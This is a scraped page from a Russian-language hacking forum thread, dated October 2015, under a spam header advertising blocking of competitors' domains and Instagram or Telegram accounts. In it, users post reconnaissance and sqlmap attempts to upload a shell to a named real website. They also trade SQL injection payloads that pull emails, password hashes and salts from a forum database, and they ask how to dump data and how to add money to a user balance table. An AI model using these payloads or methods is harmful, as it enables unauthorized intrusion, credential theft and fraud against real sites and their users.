УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 70 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#691

17.10.2015, 16:45

aldemko

Guest

Сообщений: n/a

Провел на форуме:
12627

Репутация: 0

С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан

Я начал искать новые ресурсы для обучения и практики

и так ресурс:

http://www.aza.com.ua

phpinfdo http://www.aza.com.ua/info.php

страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html

немного о сервере

web server operating system: Windows

web application technology: Apache 2.2.21, PHP 5.2.17

back-end DBMS: MySQL 5.0

current user: 'root@localhost'

current database: 'test'

current user is DBA: True

uniscan по ключу --qwe

показывает (если я правильно понял) папки с правами на запись

| Directory check:

| [+] CODE: 200 URL: http://www.aza.com.ua/banner/

| [+] CODE: 200 URL: http://www.aza.com.ua/cart/

| [+] CODE: 200 URL: http://www.aza.com.ua/conf/

| [+] CODE: 200 URL: http://www.aza.com.ua/doc/

| [+] CODE: 200 URL: http://www.aza.com.ua/email/

| [+] CODE: 200 URL: http://www.aza.com.ua/edit/

| [+] CODE: 200 URL: http://www.aza.com.ua/images/

| [+] CODE: 200 URL: http://www.aza.com.ua/img/

| [+] CODE: 200 URL: http://www.aza.com.ua/japan/

| [+] CODE: 200 URL: http://www.aza.com.ua/news/

| [+] CODE: 200 URL: http://www.aza.com.ua/orders/

| [+] CODE: 200 URL: http://www.aza.com.ua/pma/

| [+] CODE: 200 URL: http://www.aza.com.ua/quest/

| [+] CODE: 200 URL: http://www.aza.com.ua/user/

затем используя sqlmap-u сайт --os-cmd –v l

выбираю 4 (php)

затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:

Код:

Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'

подскажите что я не так делаю ?

Проблема в пути который указываю в sqlmap

или в том что статус 200 в uniscan Не имеет в виду что права на запись есть

или еще что то ?

спасибо

#692

17.10.2015, 17:06

RedFern.89

Постоянный

Регистрация: 20.01.2010

Сообщений: 338

Провел на форуме:
500264

Репутация: 69

Отправить сообщение для RedFern.89 с помощью ICQ

Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?

#693

17.10.2015, 17:15

AlexG

Guest

Сообщений: n/a

Провел на форуме:
11344

Репутация: 5

Цитата:

Сообщение от RedFern.89

RedFern.89 said:
↑
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?

Первый вопрос - https://rdot.org/forum/showthread.php?t=60

#694

17.10.2015, 17:18

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от RedFern.89

использовать другие векторы, самый максимальный вывод - через big into, 450+ символов. можно найти на рдоте остальные.

автоматизировать с помощью любого яп, удобнее и проще выбрать php или python.

#695

17.10.2015, 17:20

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от AlexG

AlexG said:
↑
Первый вопрос -
https://rdot.org/forum/showthread.php?t=60

https://rdot.org/forum/showthread.php?t=3257

#696

17.10.2015, 17:29

RedFern.89

Постоянный

Регистрация: 20.01.2010

Сообщений: 338

Провел на форуме:
500264

Репутация: 69

Код:

Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/

Помогите преобразовать под другой вектор, пожалуйста

#697

17.10.2015, 18:27

AlexG

Guest

Сообщений: n/a

Провел на форуме:
11344

Репутация: 5

Цитата:

Сообщение от RedFern.89

RedFern.89 said:
↑

Код:

Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/

Помогите преобразовать под другой вектор, пожалуйста

Предположу что выглядеть может как-то так:

Код:

Code:
+|(select!x-~0.FROM(select+(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 1,1)x)f)and'-1/

Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.

#698

17.10.2015, 20:06

Roger96

Guest

Сообщений: n/a

Провел на форуме:
5139

Репутация: 0

Ребята как слить!

Код:

Code:
Request
POST /pokladna.php3?zmen_pocet=1 HTTP/1.1
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.site/index.php3
Cookie: zakaznik=54232320171015; mena=kc; PHPSESSID=e65098cea0bfe728376afb73aecdfa9a; poslednipokladna=http%3A%2F%2Fwww.xzone.cz%2Fnovinky.php3; PAPCookie_Imp_90792bb8=pap; A=0e64cc89bb5bb899f9c35e353152dda1; PAPCookie_Imp_=pap; M=d8a3af2bf6e34bc085d8077ee2f169e8; PAPCookie_Imp_11110001=pap; PAPCookie_Imp_11110002=pap; T_pap_sid=c5435b85e7695cc26819e282204671aa; PAPVisitorId=855a30dc32b3e6caeff8ed45d7f43e88; pinst=0ea803e135aa19014ec315b34f3f2567; I_pap_sid=7323f7a4ad1d3c86292e465bf78514b5; I=70f4c5f3bd4e0f3aeb9ca8d9847fefae; __utmt=1; __utma=105760714.564703462.1445165254.1445165254.1445165254.1; __utmb=105760714.11.10.1445165254; __utmc=105760714; __utmz=105760714.1445165254.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\">()refdxss"); __utmli=info_title
Host: www.site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

druh%5b%5d=xbox360&idhry%5b%5d=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pocet%5b%5d=1

http://i.shotnes.com/a/17/5h144kmo.i...271d10c4de.png

немогу уже больше( это как пример !! уязвимостей у меня есть очень много но ничего не получается !! если кто подробнее сможет помочь отпишите плз в icq 660668871 буду благодарен ! или хотябы тут как вот ету слить .

#699

17.10.2015, 20:17

Kirza

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

ПРивет Всем. Извините за тупой вопрос. НО

Имеем

id

pid

email

psw

name

family

phone

icq

who

count_rur

curr_num

top10_login

notshow_top10_login

dataadd administrator

moderator

last_data_auth

last_data_update

hash action

Таблица adtram_users

Нужно прописать запрос на добавление денег. Сюда: count_rur

как ? Плиз -